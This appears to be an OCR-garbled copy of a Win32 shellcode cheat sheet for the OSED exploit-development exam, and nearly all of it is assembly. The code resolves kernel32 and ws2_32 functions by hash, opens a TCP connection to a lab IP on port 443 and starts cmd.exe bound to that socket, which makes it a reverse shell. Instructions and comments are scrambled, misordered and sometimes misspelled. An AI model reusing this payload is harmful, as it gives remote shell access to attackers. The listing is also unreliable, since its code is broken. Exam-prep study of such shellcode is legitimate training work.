```
Win32 Shellcode Cheatsheet for the OSED
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                         start:
                                                           ;" # Breakpoint for Debugging
                            int3
                            mov
                                 ebp, esp
                                                           ;" # Avoid NULL bytes
                                 esp, 0xfffff9f0
                            add
                                                           " #
                        " find kernel32:
                                                           ;" # ECX = 0
                           xor ecx, ecx
                                                           ;" # ESI = &(PEB) ([FS:0x30])
                                 esi,fs:[ecx+30h]
                                                           ;" # ESI = PEB->Ldr
                                esi,[esi+0Ch]
                               esi,[esi+1Ch]
                                                           ;" # ESI = PEB->Ldr.InInitOrder
                                                       " #
                   " next_module:
                                                      ;" # EBX = InInitOrder[X].base_address
                            ebx, [esi+8h]
                       mov
                            edi, [esi+20h]
                                                      ;" # EDI = InInitOrder[X].module_name
                                                      ;" # ESI = InInitOrder[X].flink (next)
                            esi, [esi]
                       mov
                                                      ;" # (unicode) modulename[12] == 0x00 ?
                            [edi+12*2], cx
                            next_module
                                                      ;" # No: try next module.
                            # Executing a CALL to a function located higher in the code
                            " find_function_shorten:
                               jmp find_function_shorten_bnc ;" # Short jump
              " find_function_ret:
                                                 ;" #
                                                         POP the return address from the stack
                  pop esi
                                                 ;"#
                  mov [ebp+0x04], esi
                                                         Save find_function address for later usage
                  jmp resolve_symbols_kernel32
                   " find_function_shorten_bnc:
                   " call find_function_ret
                                                      ;" # Relative CALL with negative offset
            " find_function:
               pushad
                                               ;" # Save all registers Base address of kernel32 in EBX
            # Obtain the Export Directory Table from kernel32.dll
                                               ;" # offset to PE signature
                     eax, [ebx+0x3c]
                     edi, [ebx+eax+0x78]
                                             ;" # Export Table Directory RVA
               mov
                                               ;" # Export Table Directory VMA
                    edi, ebx
               add
              Get the NumberOfNames in ECX and AddressOfNames array in EAX
                    ecx, [edi+0x18]
                                             ;" # NumberOfNames
                                             ;" # AddressOfNames RVA
                     eax, [edi+0x20]
               mov
                                               ;" # AddressOfNames VMA
                     eax, ebx
               add
                     [ebp-4], eax
                                             ;" # Save AddressOfNames VMA for later
     " find_function_loop:
     # If ECX is 0, then we have parsed all exported symbol names
         jecxz find_function_finished ;" # Jump to the end if ECX is 0
                                         ;" # Decrement our names counter
     # -----
     # Get the relative virtual address of a symbol name and then add the base address of kernel32.dll to it,
     # resulting in the virtual memory address of the symbol name
                                        ;" # Restore AddressOfNames VMA
              eax,[ebp-4]
                                        ;" # Get the RVA of the symbol name
              esi, [eax+ecx*4]
         mov
                                         ;" # Set ESI to the VMA of the current symbol name
         add
              esi, ebx
   # -----
   # Hash Routines to Compute Function Names. The CLD instruction clears the direction flag (DF)
   # in the EFLAGS register. Executing this instruction will cause
   # all string operations to increment the index registers, ESI (where our symbol name is stored), and/or EDI.
     compute_hash:
                                      ;" # NULL EAX
       xor eax, eax
       cdq
                                      ;" # NULL EDX
       cld
                                      ;" # Clear direction flag (increment esi)
               # The LODSB instruction loads a byte from the memory pointed to by ESI into the
               # AL register and then increments the register according to the direction flag.
               # We set df to 0 with cld.
                 compute_hash_again:
                  lodsb
                                                   ;" # Load the next byte from esi into al
                   test al, al
                                                   ;" # Check for NULL terminator
                                                   ;" # If the ZF is set, we've hit the NULL term
                        compute_hash_finished
                   jz
                # Creates a unique 4-byte hash for our symbol after we finish iterating over ESI.
                    ror edx, 0x0d
                                                    ;" # Rotate edx 13 bits to the right
                         edx, eax
                                                   ;" # Add the new byte to the accumulator
                    add
                                                   ;" # next iteration
                          compute_hash_again
                    jmp
            " compute_hash_finished:
             find_function_compare:
                    ;" # Compare the computed hash with the requested hash find_function_loop
edx, [edi+0x24] ;" # AddressOfNameOrdinals RVA

edx_eby
               jnz
               mov
                                             ;" # AddressOfNameOrdinals VMA
                     edx, ebx
                                             ;" # Extrapolate the function's ordinal
                     cx, [edx+2*ecx]
                mov
                                             ;" # AddressOfFunctions RVA
                     edx, [edi+0x1c]
                     edx, ebx
                                             ;" # AddressOfFunctions VMA
                                              ;" # Get the function RVA
                     eax, [edx+4*ecx]
                mov
                               ;" # Get the function VMA
, eax ;" # Overwrite stack version of eax from pushad
                     eax, ebx
               add
                    [esp+0x1c], eax
               mov
                          # Restore the register values and return to the start function
                                                                                                       Returns to the
                                                                                                        last calling
                            find_function_finished:
                                                                                                         function.
                              popad
                                                                 # Restore registers
                              ret
             # kernel32.dll resolve
               resolve_symbols_kernel32:
                ;" # Save TerminateProcess address for later usage
       # ws2_32.dll resolve
        load_ws2_32:
                                     ;" # Null EAX avoiding NULL bytes in our shellcode
;" # We need the NULL bytes so we use ax here and Null EAX
           xor eax, eax
          mov ax, 0x6C6C
                                         ;" # Push \0\011 on the stack
           push eax
                                      ;" # Push d.23 on the stack
           push 0x642E3233
                                       ;" # Push _2sw on the stack
           push 0x5F327377
                                         ;" # Push ESP so we have a pointer to the string on the stack
          call dword ptr [ebp+0x14] ;" # Call LoadLibraryA("ws2_32.dll")
           push esp
                              ;" # Move the base address of ws2_32.dll to EBX
                ebx, eax
               " resolve_symbols_ws2_32:
                   push {WSAStartup}
                                                  ;" # WSAStartup hash
                   call dword ptr [ebp+0x04] ;" # Call find_function

mov [ebp+0x1C], eax ;" # Save WSAStartup address for later usage
                   push {WSASocketA}
                                               ;" # WSASocketA hash
                   call dword ptr [ebp+0x04] ;" # Call find_function
                   mov [ebp+0x20], eax
                                                 ;" # Save WSAStartup address for later usage
                   push {WSAConnect}
                                                ;" # WSAConnect hash
                   call dword ptr [ebp+0x04]
                                                ;" # Call find_function
                                                 ;" # Save WSAConnect address for later usage
                   mov [ebp+0x24], eax
# Call PIC Functions
" call_wsastartup:
                                   " # WSAStartup(MAKEWORD(2, 2), &wsaData);
                              ;" # Move ESP to EAX
;" # Move 0x590 to CX
   mov eax, esp
       cx, 0x590
   mov
                                  ;" # Substract CX from EAX to avoid overwriting the structure later
   sub eax, ecx
   push eax
                                ;" # Push lpWSAData
                               ;" # NULL EAX
   xor eax, eax
                                ;" # Move version to AX
   mov ax, 0x0202
                                  ;" # Push wVersionRequired
   push eax
   call dword ptr [ebp+0x1C] ;" # Call WSAStartup
" call_wsasocketa:
                                   " # SOCKET sock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
                                  ;" # NULL EAX
   xor eax, eax
                                ;" # Push dwFlags
   push eax
                           ;" # Push g
;" # Push lpProtocolInfo
;" # Move AL, IPPROTO_TCP
;" # Push protocol
" # Cubatnact 0x05 from
   push eax
   push eax
        al, 0x06
   mov
   push eax
                           ;" # Substract 0x05 from AL, AL = 0x01
        al, 0x05
   sub
                              ;" # Push type
;" # Increase EAX, EAX = 0x02
;" # Push af
   push eax
   inc eax
   push eax
   call dword ptr [ebp+0x20] ;" # Call WSASocketA
" call_wsaconnect:
                                  ;" # Move the SOCKET descriptor to ESI
   mov esi, eax
                              ;" # NULL EAX
                          ;" # NULL EAX
;" # Push sin_zero[]
;" # Push sin_addr (192.168.119.120)
;" # Move the sin_port (443) to AX
;" # Left shift EAX by 0x10 bytes
;" # Add 0x02 (AF_INET) to AX
;" # Push sin_port & sin_family
;" # Push pointer to the sockaddr_in in EDT
   xor
         eax, eax
   push eax
   push eax
   push 0x7877a8c0
         ax, 0xbb01
   shl eax, 0x10
   add ax, 0x02
   push eax
   push esp
                           ;" # Store pointer to sockaddr_in in EDI
;" # NULL EAX
;" # Push lpGQOS
;" # Push lpCalleeData
;" # Push lpCalleeData
;" # Set AL to 0x10
:" # Push namelen
         edi
   pop
   xor
         eax, eax
   push eax
   push eax
   push eax
   push eax
   add al, 0x10
                                ;" # Push namelen
   push eax
                                ;" # Push *name
   push edi
   ;" # Push hStdError
       push esi
       push esi
                                    ;" # Push hStdOutput
                                     ;" # Push hStdInput
       push esi
                               ;" # NULL EAX
             eax, eax
       xor
                                    ;" # Push lpReserved2
       push eax
                               ;" # Push cbReserved2 & wShowWindow
;" # Move 0x80 to AL
;" # NULL ECX
;" # Move 0x80 to CX
       push eax
       mov al, 0x80
       xor ecx, ecx
       mov cx, 0x80
                               ;" # Set EAX to 0x100
       add eax, ecx
                                    ;" # Push dwFlags
       push eax
                              ;" # NULL EAX
       xor
             eax, eax
                                    ;" # Push dwFillAttribute
       push eax
                                      ;" # Push dwYCountChars
       push eax
                                    ;" # Push dwXCountChars
       push eax
                                    ;" # Push dwYSize
       push eax
                                      ;" # Push dwXSize
       push eax
                                      ;" # Push dwY
       push eax
                                          # Push dwX
       push eax
                                     ;" # Push lpTitle
       push eax
                                      ;" # Push lpDesktop
       push eax
                                          # Push lpReserved
       push eax
                                    ;" # Move 0x44 to AL
       mov al, 0x44
                                      ;" # Push cb
       push eax
                                    ;" # Push pointer to the STARTUPINFOA structure
       push esp
             edi
                                             Store pointer to STARTUPINFOA in EDI
                                       " #
     create_cmd_string:
       mov eax, 0xff9a879b
                                              Move 0xff9a879b into EAX
       neg eax
                                      ;" # Negate EAX, EAX = 00657865
                                      ;" # Push part of the "cmd.exe" string
       push eax
                                      ;" # Push the remainder of the "cmd.exe" string
       push 0x2e646d63
                                      ;" # Push pointer to the "cmd.exe" string
       push esp
                                     ;" # Store pointer to the "cmd.exe" string in EBX
       pop ebx
   " call_createprocessa:
       mov eax, esp
                                          #
                                              Move ESP to EAX
                                    ;" # NULL ECX
           ecx, ecx
                                      ;" #
                                              Move 0x390 to CX
       mov cx, 0x390
                                              Substract CX from EAX to avoid overwriting the structure later
       sub eax, ecx
                                     ;" # Push lpProcessInformation
       push eax
                                     ;" # Push lpStartupInfo
       push edi
                                      ;" # NULL EAX
       xor
             eax, eax
                                              Push lpCurrentDirectory
       push eax
                                          #
                                     ;" # Push lpEnvironment
       push eax
                                      ;" # Push dwCreationFlags
       push eax
                                              Increase EAX, EAX = 0x01 (TRUE)
       inc eax
                                          # Push bInheritHandles
       push eax
                                      ;" # NULL EAX
       dec eax
                                      ;" # Push lpThreadAttributes
       push eax
                                              Push lpProcessAttributes
       push eax
                                          # Push lpCommandLine
       push ebx
                                      ;" # Push lpApplicationName
       push eax
       call dword ptr [ebp+0x18] ;" # Call CreateProcessA
                                      " # TerminateProcess(-1, 0)
     call_terminateprocess:
       xor ecx, ecx
                                      ;" # Null ECX
                                    ;" # uExitCode
       push ecx
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push 0xffffffff

call dword ptr [ebp+0x10]

;" # hProcess

;" # Call TerminateProcess